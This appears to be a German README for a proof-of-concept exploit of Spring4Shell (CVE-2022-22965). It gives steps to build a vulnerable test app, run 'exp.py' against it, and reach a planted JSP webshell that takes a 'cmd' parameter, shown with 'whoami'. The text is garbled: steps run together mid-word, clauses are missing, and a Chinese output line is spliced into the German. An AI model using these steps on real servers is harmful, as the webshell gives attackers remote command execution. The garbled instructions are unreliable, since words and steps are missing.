
Proof-of-concept-Exploit für Spring4Shell (CVE-2022-22965), der eine JSP-Webshell über manipulierte HTTP-Anfragen auf verwundbare Spring Boot-Anwendungen auf Apache Tomcat bereitstellt.
Beschreibung der Schwachstelle: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Aufbau des POC: https://github.com/BobTheShoplifter/Spring4Shell-POC
Getestet mit JDK 11.0.14, Spring Boot 2.6.5 und Apache Tomcat 9.0.60
mvn clean package aus, um die Anwendung zu bauendemo-0.0.1-SNAPSHOT.war in spring-poc.war um und kopiere diese .war-Datei in das webapps-Verzeichnis von Tomcatpython exp.py --url http://localhost:8080/spring-poc/greeting aus
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami protokolliert.tomcatwar.jsp in das Verzeichnis webapps/spring-poc von Tomcat geschrieben wurde. Dieses Verzeichnis kann durch Ändern von exp.py angepasst werden.

